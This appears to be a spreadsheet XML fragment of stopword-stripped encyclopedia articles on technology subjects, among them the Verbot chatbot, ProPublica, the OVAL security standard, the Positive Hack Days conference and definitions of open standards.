    <t>verbot (verbal-robot) popular chatterbot program artificial intelligence software development (sdk) windows platform web. early beginning virtual personalities, inc. traces technology back michael mauldin's work graduate student post-doctoral fellow carnegie mellon university; artistry back peter plantec's work personality psychology direction. historic outline 1994, mauldin, founder lycos, inc., developed prototype chatterbot, julia, competed internationally known turing test, coveted loebner prize. turing test matches computer scientist judges machines distinguish computer real human. this prototype version refined developed, 1997, mauldin peter plantec, clinical psychologist, animator, formed virtual personalities, inc. (now conversive, inc.) order create virtual human interface would incorporate real-time animation well speech natural language processing. initial release, stand-alone virtual person called sylvie, beta-tested public. this release well received, finally, several versions, production release (deemed version verbally enhanced software robot—or, verbot deployed fall 2000. grandfather verbots rog-o-matic, although could talk, could explore virtual world. julia active internet form another since 1989. close cousin julia lycos, robot explores world wide answers questions sylvie first verbot face voice. sylvie first virtual human advanced, flexible interfacing capability. beginnings virtual personalities story goes back 1978, mauldin attending rice university. fascinated idea eliza, proceeded write program called "pet" kilobyte commodore computer. included simple induction post information, example: subject: like friend (later) subject: like food. pet: heard food friend. meanwhile, plantec separately designing personality "entity", theoretical virtual human would interact comfortably humans without pretending one. time technology advanced enough realize entity. mauldin involved this, majored computer science minored linguistics. rogue late seventies early eighties, popular computer game universities rogue, implementation dungeons dragons player would descend levels randomly created dungeon, fighting monsters, gathering treasure, searching elusive "amulet yendor". mauldin four grad students devoted large amount time building program called "rog-o-matic" could several occasions manage retrieve amulet emerge victorious dungeon. tinymud 1989, james aspnes carnegie mellon created first tinymud descendant abermud), mauldin first create computer player would explore text-based world tinymud. first robot, gloria, gradually accreted linguistic ability, point could pass "unsuspecting" turing test. version test, human reason suspect occupants room controlled computer, polite asks fewer probing questions. second generation mauldin's tinymud robots julia, created jan. 1990. julia slowly developed capable conversational agent, assumed useful duties tinymud world, including tour guide, information assistant, note-taker, message-relayer, even could play card game hearts along human players. 1991, first loebner prize contest held boston, mass., julia there. although finished third, ranked judge human human confederates, winning coveted certificate humanness world's first restricted turing test. julia continued various tinymud's tinymucks next seven years, also chats hundreds people month internet. lycos julia's explore virtual world consisting pages textual descriptions, links them, construct internal world answer questions (including path information shortest route room another, matching information, rooms contained certain kind object textual description). therefore short cognitive leap julia lycos, another robotic agent explores virtual world made hyperlinked pages text, answers questions pages. sylvie born abilities expanded greatly include interfacing computers control systems serial ports. sylvie sylvie first intelligent animated virtual human. designed conversation agent virtual human interface would form bridge two. became popular conversation agent, designers believe serves prototype future virtual human interface design help cope increasing complexity technology. aside, plantec noticed inordinately large number sylvies sold southeast asia. upon investigation discovered students discovered "test" mode would allow type english sentences sylvie would pronounce somewhat stylized english. sylvie teaching english style english. ownership 1997, mauldin peter plantec, formed virtual personalities, inc. create natural language processing solutions companies. 2001 virtual personalities, inc. became conversive, inc. reflect focus providing customer service marketing enterprise market. late 2012 avaya, inc. acquired conversive's assets including verbots. verbot versions verbot version created released 2004. 2005 version verbot software released many feature enhancements fixes, including built-in support embedding code outputs conditionals. early 2006 conversive launched verbots online allowing verbot users upload knowledge show bots world. 2009 version released, completely free fully featured. early 2012 last version verbot, 5.0.1.2, released general public support windows also 2012 verbots online completely shutdown. verbots today verbots.com, community users forums longer exist software users still found. there active development since early 2012 release verbot 5.0.1.2. also turing test loebner prize chatbot notes external links "julia". carnegie mellon. conversive "verbots". blog spot. 2014 [2012]. verbot permanently shutdown "verbot engine sdk". source forge. open source (gpl). "verbot knowedgebase editor (vke)". github.</t>
  </si>
  <si>
    <t>Cambridge IT Skills Diploma</t>
  </si>
  <si>
    <t>cambridge skills diploma certificate based microsoft office software, certificate assesses range important skills required available levels: foundation standard. exam methodology these online based examinations consist levels candidate choose. standard foundation assessments computer-based available on-demand throughout year provide high-quality flexible assessment service individuals centers.[1] diploma modules program's modules cover following topics: introduction usage managing files. word processing, spreadsheets, presentations databases using microsoft office. electronic communication using microsoft internet explorer. diploma types name certificate awarded successful candidate “cambridge international diploma skills” there four types diploma: single-module diploma, basic requirement seven applications. four-module diploma, basic requirements introduction windows, word electronic communication. five-module diploma, basic requirements windows, word, excel, (access powerpoint) internet communication. seven-module diploma, basic requirements introduction windows, microsoft office internet communication.[2] recognition accreditation importance cambridge diploma skills, many professional bodies international organizations given support, ranging official approval diploma requiring diploma employees. cambridge diploma skills recognized many organizations governments jordan, kuwait, kingdom bahrain, lebanon, united arab emirates (uae), united nations educational, scientific cultural organization (unesco) united nations relief works agency (unrwa).[3] abu-ghazaleh cambridge skillcenter exclusive center middle east provides cambridge skills diploma arabic. references cie.org terabyteit.com ameinfo.com external links cambridge international diploma information technology abu-ghazaleh cambridge information technology skills center</t>
  </si>
  <si>
    <t>Camara (social enterprise)</t>
  </si>
  <si>
    <t>camara social enterprise sends refurbished computers provides digital literacy training schools educational institutions ethiopia, kenya, zambia, lesotho, tanzania ireland. history camara founded 2005 cormac lynch, former engineer investment banker, visit ethiopia opportunity technology enhance education world's disadvantaged communities. lynch heard schools computers needed most. return dublin skip-load discarded pcs, idea struck, would camara give life computers lease life benefit school children disadvantaged communities.the name 'camara' comes west african bantu dialect means 'teacher' 'one teaches experience'. many people read 'camera' pronounce such, however correct pronunciation ra'. organisation's logo, ananse ntontan ("spider's web"), comes adinkra symbols found ghana historically used asante tribe cloth, walls pottery.ninth president ireland michael higgins organisation's patrons, british film producer educator lord david puttnam. awards 2018 camara education good governance award annual report financial statements. 2016 camara education received innovative programme year 2016 dóchas award imlango programme kenya. 2013 camara education received excellence award best technology education training. 2012 camara education received lord mayor's award, honoured camara special contribution dublin citizens. 2012 camara education ranked 32nd deloitte technology fast award honours business growth, technological innovation entrepreneurial spirit. 2012 camara rwanda, camara education, received 'japanese award innovative development project' 12th annual global development network conference january 2011. 2011 camara education reached 15th place deloitte technology fast award. 2010 camara received arthur guinness fund award. also computer recycling electronic waste country computer technology developing areas references external links camara</t>
  </si>
  <si>
    <t>Open Virtualization Alliance</t>
  </si>
  <si>
    <t>open virtualization alliance (ova) linux foundation collaborative project committed foster adoption free open-source software virtualization solutions including kvm, also software manage such, e.g. ovirt. consortium promoted examples customer successes, encouraged interoperability accelerated expansion ecosystem third party solutions around kvm.the provided education, best practices technical advice help businesses understand evaluate virtualization options. consortium complemented existing open source communities managing development hypervisor associated management capabilities, rapidly driving technology innovations customers virtualizing linux windows® applications. formal standards body influence upstream development, encouraged interoperability development common interfaces application programming interfaces (apis) ease adoption users. october 2013, announced open virtualization alliance become linux foundation collaborative project.having achieved original purpose, december 2016, officially dissolved. software promoted kernel-based virtual machine (kvm) software turns linux kernel hypervisor libvirt implementation manage virtualization solutions ovirt application managing libguestfs implementation modifying virtual disk images membership initially formed ibm, alliance members involved enterprise virtualization. participation open encouraged participants become members. membership tiered, governing memberships requiring higher dues general memberships. criteria joining alliance produce product service based kvm. references</t>
  </si>
  <si>
    <t>ProPublica</t>
  </si>
  <si>
    <t>propublica legally publica, inc., nonprofit organization based york city. newsroom aims produce investigative journalism public interest. 2010, became first online news source pulitzer prize, piece written journalists published york times magazine well propublica.org. propublica states investigations conducted staff full-time investigative reporters, resulting stories distributed news partners publication broadcast. cases, reporters propublica partners work together story. propublica partnered different news organizations, pulitzer prizes. history propublica brainchild herbert marion sandler, former chief executives golden west financial corporation, committed million year project. sandlers hired paul steiger, former managing editor wall street journal, create organization editor chief. time propublica steiger responded concerns role political views sandlers, saying newshour lehrer: coming this, talked herb marion sandler, concerns precisely question independence nonpartisanship history "down middle" reporting. talked herb marion said "are comfortable that?" they said, "absolutely." said, "well, suppose exposé left leaning organizations supported friendly supported past."they said, problem." organizational structure, board directors, herb chairman, know advance we're going report propublica initial news staff reporters editors, including pulitzer prize winners charles ornstein, tracy weber, jeff gerth, marcus stern. steiger reported received applications upon propublica's announcement. organization appointed 12-member advisory board professional journalists. newsgroup shares work creative commons no-derivative, non-commercial license.on august 2015, yelp announced partnership company help improve healthcare statistics. funding while sandler foundation provided propublica significant financial support, also received funding knight foundation, macarthur foundation, charitable trusts, ford foundation, carnegie corporation, atlantic philanthropies. propublica knight foundation various connections. example, paul steiger, executive chairman propublica, trustee knight foundation. like manner, alberto ibarguen, president knight foundation board propublica.propublica attracted attention salaries pays employees. 2008, paul steiger, editor propublica, received salary $570,000. steiger formerly managing editor wall street journal, total compensation (including options) double propublica. steiger's stated strategy wall street journal model attract journalistic talent. 2010, eight propublica employees made $160,000, including managing editor stephen engelberg ($343,463) highest-paid reporter, dafna linzer, formerly washington post ($205,445).engelberg former york times editor co-wrote non-fiction book germs: biological weapons america's secret war, times reporter judith miller. awards 2010, propublica jointly pulitzer prize investigative reporting also awarded another news organization different story) "the deadly choices memorial", story chronicles urgent life-and-death decisions made hospital's exhausted doctors floodwaters hurricane katrina." written propublica's sheri fink published york times magazine well propublica.org. this first pulitzer awarded online news source. article also 2010 national magazine award reporting.in 2011, propublica second pulitzer prize. reporters jesse eisinger jake bernstein pulitzer prize national reporting series, wall street money machine. this first time pulitzer awarded group stories published print. 2016, propublica third pulitzer prize, time explanatory reporting, collaboration marshall project startling examination exposé enforcement's enduring failures investigate reports rape properly comprehend traumatic effects victims."in 2017, propublica york daily news awarded pulitzer prize public service series reports eviction rules york city police department.in 2019, peabody awards honored propublica first-ever peabody catalyst award releasing audio 2018 brought immediate change controversial government practice family separation southern border.also 2019, propublica reporter hannah dreier awarded pulitzer prize feature writing series followed immigrants long island whose lives shattered botched crackdown ms-13.in 2020, propublica pulitzer prize public service illuminating public safety gaps alaska.in year, propublica also pulitzer prize national reporting coverage united states navy collisions fitzgerald john mccain (ddg-56) civilian vessels separate incidents western pacific. stories written christian miller, megan rose robert faturechi. notable reporting projects unbelievable story rape" christian miller propublica armstrong marshall project collaborated piece process discovered serial rapist colorado washington state. piece 2016 pulitzer prize explanatory reporting. this piece adapted 2019 netflix series unbelievable. conservative groups december 2012 january 2013, propublica published reported confidential pending applications groups requesting tax-exempt status. 2013, widespread coverage allegations inappropriately targeted conservative groups, propublica clarified obtained documents freedom information request, writing, response request applications different nonprofits last november, cincinnati office sent propublica applications documentation groups. nine applications approved—meaning supposed made public." propublica reported them, deeming information within applications newsworthy. psychiatric solutions propublica conducted large-scale, circumscribed investigation psychiatric solutions, company based tennessee buys failing hospitals, cuts staff, accumulates profit. report covered patient deaths numerous psychiatric solutions facilities, failing physical plant many facilities, covered state florida's first closure manatee palms youth services, since shut florida officials again. their report published conjunction angeles times. documenting hate 2017, propublica launched documenting hate project systematic tracking hate crimes bias incidents. project part civil rights beat, allows victims witnesses hate crime incidents submit stories. project also allows journalists newsrooms partner propublica write stories based dataset collecting. example, minneapolis star tribune partnered propublica write reporting hate crimes minnesota. surgeon scorecard 2015, propublica launched surgeon scorecard, interactive database allows users view complication rates eight common elective procedures. tool allows users find surgeons hospitals, complication rates. database controversial, drawing criticism doctors prompting critique rand. however, statisticians, including andrew gelman, stood behind decision attempt shine light opaque aspect medical field, propublica offered specific rebuttals rand's claims. tracking evictions rent stabilization york city propublica created interactive allows people search addresses york city effects eviction cases. nominated livingston award. taxes paid wealthiest americans june 2021, receiving leaked, hacked, stolen documents, propublica published report showed rates wealthiest americans significantly lower average middle class rate, considering unrealized capital gains equivalent earned income. propublica would later reveal technology investor political donor peter thiel legally earned billion tax-free roth account investments private companies.on june attorney general merrick garland told lawmakers investigating source release would priority justice department. board members danielle allen claire bernard mark colodny steve daetz angela filo henry louis gates claire hoffman katie mcgrath bobby monks ronald olson paul sagan paul steiger james stone donald sussman also journalism portal references external links official website tigas, mike (january 2016). more secure anonymous propublica using hidden services". propublica. "propublica internal revenue service filings". propublica nonprofit explorer.</t>
  </si>
  <si>
    <t>CallApp</t>
  </si>
  <si>
    <t>callapp mobile offering caller call blocking call recording. gives background information entities behind incoming outgoing calls utilizing user’s community-generated content social networking services. history callapp invented founded 2011, aviv, israel former ceo, oded volovitz. raising million seed investment. initially introduced publicly techcrunch disrupt york 2012, launched application android, demo conference, mobile world congress, barcelona. geek award fledgling start-up year 2012. 2014, company raised million angel investors saar wilf moshe lichtman giza susquehanna venture capital funds. amit named company’s 2014, callapp five million users along 50,000 daily downloads, making leading apps google play. february 2021, million users. features callapp provides caller gives users means identify telemarketing, spammers robocall numbers, enables call blocking blacklisting unsolicited callers. provides user real-time information entities behind incoming outgoing calls utilizing info people businesses share along communications callapp community decides share. synchronizes user email calendar, shows mutual contacts, includes business information. also offers call recording, telephone directory, reverse telephone directory, private browsing, call reminder mode, well paid upgrade options. references external links callapp homepage</t>
  </si>
  <si>
    <t>Open Vulnerability and Assessment Language</t>
  </si>
  <si>
    <t>open vulnerability assessment language (oval) international, information security, community standard promote open publicly available security content, standardize transfer information across entire spectrum security tools services. oval includes language used encode system details, assortment content repositories held throughout community. language standardizes three main steps assessment process: representing configuration information systems testing; analyzing system presence specified machine state (vulnerability, configuration, patch state, etc.); reporting results assessment.the repositories collections publicly available open content utilize language. oval community developed three schemas written extensible markup language (xml) serve framework vocabulary oval language. these schemas correspond three steps assessment process: oval system characteristics schema representing system information, oval definition schema expressing specific machine state, oval results schema reporting results assessment. content written oval language located many repositories found within community. repository, known oval repository, hosted mitre corporation. central meeting place oval community discuss, analyze, store, disseminate oval definitions. each definition oval repository determines whether specified software vulnerability, configuration issue, program, patch present system. information security community contributes development oval participating creation oval language oval developers forum writing definitions oval repository oval community forum. oval board consisting representatives broad spectrum industry, academia, government organizations around world oversees approves oval language monitors posting definitions hosted oval site. this means oval, funded us-cert u.s. department homeland security benefit community, reflects insights combined expertise broadest possible collection security system administration professionals worldwide. oval used security content automation protocol (scap). oval language oval language standardizes three main steps assessment process: representing configuration information systems testing; analyzing system presence specified machine state (vulnerability, configuration, patch state, etc.); reporting results assessment. oval interpreter oval interpreter freely available reference implementation created show data collected computer testing based oval definitions evaluated determine results definition. oval interpreter demonstrates usability oval definitions, used definition writers ensure correct syntax adherence oval language development draft definitions. fully functional scanning tool simplistic user interface, running oval interpreter provide list result values evaluated definition. oval repository oval repository central meeting place oval community discuss, analyze, store, disseminate oval definitions. other repositories community also host oval content, include oval system characteristics files oval results files well definitions. oval repository contains community-developed oval vulnerability, compliance, inventory, patch definitions supported operating systems. definitions free implement information security products services. oval repository contributor award program grants awards quarterly basis contributors oval repository. repository community effort, contributions content modifications instrumental success. awards serve public recognition organization’s support oval repository incentive others contribute. organizations receiving award also receive oval repository contributor logo indicating quarter award (e.g., quarter 2007) used fit. awards granted organizations made significant contribution modified content quarter. oval board oval board advisory body, provides valuable input oval moderator (currently mitre). while important organizational support oval, individuals oval board input activity truly make difference. board’s primary responsibilities work moderator community define oval, provide input oval’s strategic direction, advocate oval community. also mitre mitre corporation common vulnerability exposures (index standardized names vulnerabilities security issues) xccdf extensible configuration checklist description format security content automation protocol uses oval external links oval site gideon technologies (oval board member) corporate site www.itsecdb.com portal oval definitions several sources oval.secpod.com secpod oval definitions professional feed</t>
  </si>
  <si>
    <t>Open Web Analytics</t>
  </si>
  <si>
    <t>open analytics (owa) open-source analytics software created peter adams. written uses mysql database, makes compatible running solution stack various servers. information comparable google analytics, though server software anyone install host, google analytics software service offered google. supports tracking wordpress mediawiki, popular site frameworks. this application helps webmasters keep track observe influx views websites. program also tracks websites competitors company's growth compared site question. references external links official website</t>
  </si>
  <si>
    <t>Amazon Virtual Private Cloud</t>
  </si>
  <si>
    <t>amazon virtual private cloud (vpc) commercial cloud computing service provides users virtual private cloud, "provision[ing] logically isolated section amazon services (aws) cloud". enterprise customers able access amazon elastic compute cloud (ec2) ipsec based virtual private network. unlike traditional instances allocated internal external numbers amazon, customer assign numbers choosing subnets. giving user option selecting resources public facing not, provides much granular control security. amazon endorsement hybrid approach, also meant combat growing interest private clouds". comparison private clouds amazon virtual private cloud aims provide service similar private clouds using technology openstack helion eucalyptus. however, private clouds typically also technology openshift application hosting various database systems. cloud security experts warned compliance risks, loss control service cancellation using public resources exist in-house systems. transaction records requested amazon using national security letter even legally allowed inform customer breach security system. this would true even actual resources another country. used partly compatible helion eucalyptus compatible private cloud systems migration difficult. this warnings possibility lock-in specific technology. addressing initially, users able choose range addresses vpc. within range, users assign various private public ipv4 ipv6 addresses instances order communicate internet instances vpcs. these addresses assigned specific instances rather user's entire account.static assignment public addresses possible, instead address assigned unassigned certain cases, causing address instance change. when consistent address needed, third type address, elastic addresses, used place public addresses. connectivity allows users connect internet, user's corporate data center, users' vpcs.users able connect internet adding internet gateway vpc, assigns public ipv4 address.users able connect data center setting hardware virtual private network connection data center vpc. this connection allows user "interact amazon instances within within [the user's] existing network."users able route traffic another using private addresses, able communicate network. peering achieved connecting route vpc's account vpc's different accounts region. peering one-to-one connection, users able connect time.to achieve one-to-many connections vpcs, deploy transit gateway (tgw). addition, connect vpcs premise systems employing transit gateway. security vpc's security two-fold: firstly, uses security groups firewall control traffic instance level, also uses network access control lists firewall control traffic subnet level. another measure privacy, provides users ability create "dedicated instances" hardware, physically isolating dedicated instances non-dedicated instances instances owned accounts.aws free, users paying consumption resources. however, choosing access virtual private network (vpn), charge. also amazon elastic compute cloud oracle cloud infrastructure references external links seamlessly extending data center introducing amazon virtual private cloud blog post amazon werner vogels</t>
  </si>
  <si>
    <t>Verinice</t>
  </si>
  <si>
    <t>verinice free open source information security management system (isms) application help creating maintaining systems information security management. verinice written maintained primarily german company named sernet service network gmbh. verinice licensed general public license (version later). main users usually small medium companies, enterprises government agencies. germany, verinice recommended isms tool german association automotive industry (vda) members like volkswagen, daimler fiat manufacturers. also sponsoring verinice development since release 1.2.verinice supports operating systems windows, linux licensed baseline protection catalogs federal office information security. other tools creating isms certvision normtracker hiscout suite tool secumax crisam systems iris eramba references external links module data privacy federal commissioner data protection information freedom interest group german manufacturers baseline protection module manufacturers verinice download</t>
  </si>
  <si>
    <t>PostRank</t>
  </si>
  <si>
    <t>postrank social media analytics service used proprietary ranking algorithm measure "social engagement" published content based blog comments links, internet bookmarks, clicks, page views, activities social network services twitter, digg, facebook myspace. june 2011, postrank acquired google. company formerly called aiderss, inc. october 2008, aiderss re-launched website postrank.com focus company's work core postrank technology. july 2009, company officially changed name postrank inc. services company developed offered multiple services: postrank data services, launched july 2009, collection apis reports provide real-time data mining social data companies applications, measure marketing, strategic planning. service provided free used, example, rank talks engagement. postrank analytics, launched september, 2009, service bloggers online publishers track audiences sharing organizing content social perform competitive analysis. postrank connect, launched august, 2010, service brands public relations marketing agencies work bloggers product campaigns receive consulting services. google analytics after acquisition, postrank functionality integrated google analytics: december 2011 google analytics announced analytics social data leweb paris. march 2012 google analytics launched social reporting functionality. 2012, postrank services sunset. references</t>
  </si>
  <si>
    <t>Open and Free Technology Community</t>
  </si>
  <si>
    <t>open free technology community (oftc) network provides collaboration services members free software community part world. oftc associated project software public interest, non-profit organization founded help organizations develop distribute open hardware software. october 2019, oftc volunteer staff members, sponsors. history oftc founded 2001 group experienced members open source free software communities aiming provide communities better communication, development, support infrastructure. oftc ruled written constitution staff elect officers among using voting mechanism. oftc became member project software public interest (spi) july 2002, became legal owner project's domain names. ability users connect using transport layer security added april 2016 certificates let's encrypt certificate authority.in 2016, oftc bridged matrix instant messaging network. projects oftc currently develops three projects purposes: "oftc-hybrid" fork hybrid daemon), "oftc-ircservices" (the services suite), "oftc-geodns" geoip responder handle user distribution across servers). oftc uses github repositories host codebase issue tracker. prospective users software find tarball releases https://www.oftc.net/releases/, named according semantic versioning. developers contributing code base read familiar subversion. references further reading "freenode oftc networks start cooperation". irc-junkie.org. 2007. archived original september 2015. retrieved october 2010. "debian network moves oftc". debian. june 2006. retrieved october 2010. external links official website oftc-hybrid open oftc advogato</t>
  </si>
  <si>
    <t>When Engineering Fails</t>
  </si>
  <si>
    <t>when engineering fails 1998 film written presented henry petroski. examines causes major disasters, including explosion space shuttle challenger, compares risks computer-assisted design traditional engineering methods. original title film engineer human, title petroski's non-fiction book design failures. references</t>
  </si>
  <si>
    <t>Open security</t>
  </si>
  <si>
    <t>open security open source philosophies methodologies approach computer security information security challenges. traditional application security based premise application service (whether malware desirable) relies security obscurity.open source approaches created technology linux (and extent, android operating system). additionally, open source approaches applied documents inspired wikis largest example, wikipedia. open security suggests security breaches vulnerabilities better prevented ameliorated users facing problems collaborate using open source philosophies.this approach requires users legally allowed collaborate, relevant software would need released license widely accepted open source; examples include massachusetts institute technology (mit) license, apache license, lesser general public license (lgpl), general public license (gpl). relevant documents would need generally accepted "open content" license; include creative commons attribution (cc-by) attribution share alike (cc-by-sa) licenses, creative commons "non-commercial" licenses "no-derivative" licenses.on developer side, legitimate software service providers independent verification testing source code. information technology side, companies aggregate common threats, patterns, security solutions variety security issues. also kerckhoffs's principle oasis (organization) (organization advancement structured information standards) owasp (open application security project) open government homeland open security technology open source open source software open-source hardware references</t>
  </si>
  <si>
    <t>Positive Hack Days</t>
  </si>
  <si>
    <t>positive hack days (phdays) computer security conference held every year moscow. first conference held 2011. conference addresses topics zero-day attacks digital investigations, cryptography cyberwarfare, security person state cyberworld. attendance required. free tickets available winners special hacking contests students participated positive education program. phdays aimed wide range audience, hackers technical experts businessmen politicians. presentations given russian english. phdays 2011: them first conference held 2011. reports workshops covered topics government control information security russia, internet banking system safety, secure connection voip, protection data cloud, virtualization system security. keynote speaker event dmitry sklyarov. during conference, capture flag (ctf) competition held among information security specialists different countries. u.s. team winner.there hacking contests, participant detected zero-day vulnerability safari windows.among speakers experts kaspersky lab, russian agricultural bank, vimpelcom, rostelecom, cisco systems, leta it-company, positive technologies, pwc. about people attended one-day event. phdays 2012: future second conference conducted 2012 digital october center technologies. along parallel streams presentations workshops, competition security-related contests held again. topics divided areas: technical (exploiting radio noise, password protection, telecom security, usage sqlmap) business (internet banking security, data leakage government, seeking specialists information security). conference featured bruce schneier, american cryptographer, author applied cryptography, datuk mohd noor amin (from impact, un), alexander peslyak (known solar designer), creator password cracking tool john ripper. significant events include: demonstration zero-day vulnerabilities windows freebsd 8.3, cracking iphone contests taking control ar.drone analyzing internet banking system security. young school, competition young scientists' research papers, took place first time. among conference's participants representatives kaspersky lab, national agency computer security tunisia, cisco systems, eset, openwall project, highload lab, companies. phdays 2012 gathered 2,000 people. phdays iii: from both sides barricade third conference held world trade center. among main topics: protection, application mobile application security, preventing attacks banking systems, cooperation government, researchers information society. marc "van hauser" heuse, creator thc-hydra, amap susefirewall founder hacker choice, became leading speaker.significant events include: report scada strangelove security siemens simatic software, workshop hacking atm, workshop open organisation lockpickers (experts nondestructive lock opening), model railroad controlled real industrial systems, labyrinth's rooms laser field motion detectors.george hotz (geohot) participated contest member ppp. first unlock iphone, allowed using providers besides at&amp;t. george hotz also 2drunk2hack, contest, participants hack applications strong drink fail. specialists kaspersky lab, cisco systems, nokia, rsa, iponweb, qualys visited conference. phdays 2,500 attendees.a movie preparation conference released 2013. phdays gazes conference took place 2014 digital october. among main topics: protection critical infrastructure components, internet banking system security, internet things, regulation information security industry, cyberwarfare. alisa shevchenko detected several zero-day vulnerabilities indusoft studio contest analyzing security. significant events include: contest identifying threats smart home, discussion security telecommunications companies lack really smart grids power industry. during security-related competition, participants managed withdraw money banking system developed especially competition filled vulnerabilities commonly occur real internet banking systems. specialists kaspersky lab, cisco systems, revuln, toool, parameter security took part conference. phdays drew 2,500 attendees. phdays singular point conference held 2015 world trade center, moscow, russia. phdays standoff conference held 2016 world trade center, moscow, russia. phdays viii: enemy inside conference held 2017 world trade center, moscow, russia. phdays viii: digital conference held 2018 krasnopresnenskaya embankment, moscow, russia. phdays breaking constant conference held 2019 crocus expo international exhibition center, moscow, russia. features technical reports, workshops, competitions, discussions regulation industry business development commonly held phdays. however, feature conference providing special activities aimed creating open cyberpunk atmosphere. conference always ends live performances popular russian rock bands. 2014, cyberpunk movies played night days conference. references external links official website</t>
  </si>
  <si>
    <t>Open source software</t>
  </si>
  <si>
    <t>Open standard</t>
  </si>
  <si>
    <t>open standard standard openly accessible usable anyone. also prerequisite open license, non-discrimination extensibility. typically, anybody participate development. there single definition, interpretations vary usage. terms open standard wide range meanings associated usage. there number definitions open standards emphasize different aspects openness, including openness resulting specification, openness drafting process, ownership rights standard. term "standard" sometimes restricted technologies approved formalized committees open participation interested parties operate consensus basis. definitions term open standard used academics, european union, member governments parliaments denmark, france, spain preclude open standards requiring fees use, zealand, south african venezuelan governments. standard organisation side, world wide consortium (w3c) ensures specifications implemented royalty-free basis. many definitions term standard permit patent holders impose "reasonable non-discriminatory licensing" royalty fees licensing terms implementers users standard. example, rules standards published major internationally recognized standards bodies internet engineering task force (ietf), international organization standardization (iso), international electrotechnical commission (iec), itu-t permit standards contain specifications whose implementation require payment patent licensing fees. among organizations, ietf itu-t explicitly refer standards "open standards", others refer producing "standards". ietf itu-t definitions "open standard" allow "reasonable non-discriminatory" patent licensing requirements. there open-source software community hold "open standard" open freely adopted, implemented extended. while open standards architectures considered non-proprietary sense standard either unowned owned collective body, still publicly shared tightly guarded. typical example “open source” become standard personal computer originated referred wintel, combination microsoft operating system intel microprocessor. there three others widely accepted “open” include phones (adopted government standard), open group promotes unix like, internet engineering task force (ietf) created first standards smtp tcp/ip. buyers tend prefer open standards believe offer cheaper products choice access network effects increased competition vendors.open standards specify formats sometimes referred open formats. many specifications sometimes referred standards proprietary available restrictive contract terms obtained all) organization owns copyright specification. specifications considered fully open. joel west argued "open" standards black white many different levels "openness". open standard tends occur knowledge technology becomes dispersed enough competition increased others able start copying technology implement this occurred wintel architecture others able start imitating software. less open standards exist particular firm much power (not ownership) standard, occur firm's platform “wins” standard setting market makes platform popular. specific definitions open standard made standardization bodies joint ieee, isoc, w3c, ietf definition august 2012, institute electrical electronics engineers (ieee), internet society (isoc), world wide consortium (w3c), internet engineering task force (ietf) internet architecture board (iab), jointly affirmed principles contributed exponential growth internet related technologies. “openstand principles” define open standards establish building blocks innovation. standards developed using openstand principles developed open, participatory process, support interoperability, foster global competition, voluntarily adopted global level serve building blocks products services targeted meet needs markets consumers. this drives innovation which, turn, contributes creation markets growth expansion existing markets. there five, openstand principles, outlined below: cooperation respectful cooperation standards organizations, whereby respects autonomy, integrity, processes, intellectual property rules others. adherence principles adherence five fundamental principles standards development, namely process: decisions made equity fairness among participants. party dominates guides standards development. standards processes transparent opportunities exist appeal decisions. processes periodic standards review updating well defined. broad consensus: processes allow views considered addressed, agreement found across range interests. transparency: standards organizations provide advance public notice proposed standards development activities, scope work undertaken, conditions participation. easily accessible records decisions materials used reaching decisions provided. public comment periods provided final standards approval adoption. balance: standards activities exclusively dominated particular person, company interest group. openness: standards processes open interested informed parties.3. collective empowerment commitment affirming standards organizations participants collective empowerment striving standards that: chosen defined based technical merit, judged contributed expertise participant; provide global interoperability, scalability, stability, resiliency; enable global competition; serve building blocks innovation; contribute creation global communities, benefiting humanity.4. availability standards specifications made accessible implementation deployment. affirming standards organizations defined procedures develop specifications implemented fair terms. given market diversity, fair terms vary royalty-free fair, reasonable, non-discriminatory terms (frand). voluntary adoption standards voluntarily adopted success determined market. itu-t definition itu-t standards development organization (sdo) three sectors international telecommunication union specialized agency united nations). itu-t telecommunication standardization bureau director's group produced following definition march 2005, itu-t whole endorsed purposes since november 2005: itu-t long history open standards development. however, recently different external sources attempted define term "open standard" variety different ways. order avoid confusion, itu-t uses purpose term "open standards" following definition: "open standards" standards made available general public developed approved) maintained collaborative consensus driven process. "open standards" facilitate interoperability data exchange among different products services intended widespread adoption. other elements "open standards" include, limited collaborative process voluntary market driven development approval) following transparent consensus driven process reasonably open interested parties. reasonably balanced ensures process dominated interest group. process includes consideration response comments interested parties. intellectual property rights (iprs) iprs essential implement standard licensed applicants worldwide, non-discriminatory basis, either free reasonable terms conditions reasonable terms conditions (which include monetary compensation). negotiations left parties concerned performed outside sdo. quality level detail sufficient permit development variety competing implementations interoperable products services. standardized interfaces hidden, controlled promulgating standard. publicly available easily available implementation use, reasonable price. publication text standard others permitted prior approval sdo. on-going support maintained supported long period time.the itu-t, itu-r, iso, harmonized common patent policy banner wsc. however, itu-t definition necessarily considered also applicable itu-r, contexts, since common patent policy make reference "open standards" rather "standards." ietf definition section 2026, ietf classifies specifications developed manner similar ietf "open standards," lists standards produced ansi, iso, ieee, itu-t examples. ietf standardization processes policies characteristics listed itu-t, ietf standards fulfill itu-t definition "open standards." however, ietf adopted specific definition "open standard"; 2026 ietf's mission statement (rfc 3935) talks "open process," 2026 define "open standard" except purpose defining documents ietf standards link 2026 belongs rfcs collectively known (best common practice, ietf policy). 2026 later updated (among others). 2011 5378 (rights contributors provide ietf trust), consists 3979 (intellectual property rights ietf technology) clarification 4879. changes intended compatible "simplified license" stated ietf trust legal provisions copyright based 5377.in august 2012, ietf combined ieee launch openstand publish modern paradigm standards. this captures "the effective efficient standardization processes made internet premiere platforms innovation borderless commerce". declaration published form 6852 january 2013. legislative governmental bodies european interoperability framework pan-european egovernment services european union defined term within european interoperability framework pan-european egovernment services, version although claim universal definition european union documentation. reach interoperability context pan-european egovernment services, guidance needs focus open standards. word "open" meant sense fulfilling following requirements: standard adopted maintained not-for-profit organization, ongoing development occurs basis open decision-making procedure available interested parties (consensus majority decision etc.). standard published standard specification document available either freely nominal charge. must permissible copy, distribute nominal fee. intellectual property i.e. patents possibly present (parts standard made irrevocably available royalty-free basis. there constraints re-use standard network centric operations industry consortium definition network centric operations industry consortium (ncoic) defines open standard following: specifications hardware and/or software publicly available implying multiple vendors compete directly based features performance products. also implies existing open system removed replaced another vendor minimal effort without major interruption. danish government definition danish government attempted make definition open standards, also used pan-european software development projects. states: open standard accessible everyone free charge (i.e. discrimination users, payment considerations required condition standard) open standard necessity remains accessible free charge (i.e. owners renounce options, indeed exist, limit access standard later date, example, committing openness remainder possible patent's life) open standard accessible free charge documented details (i.e. aspects standard transparent documented, access documentation free) french definition french parliament approved definition "open standard" "law confidence digital economy." definition (article open standard understood communication, interconnection interchange protocol, interoperable data format whose specifications public without restriction access implementation. 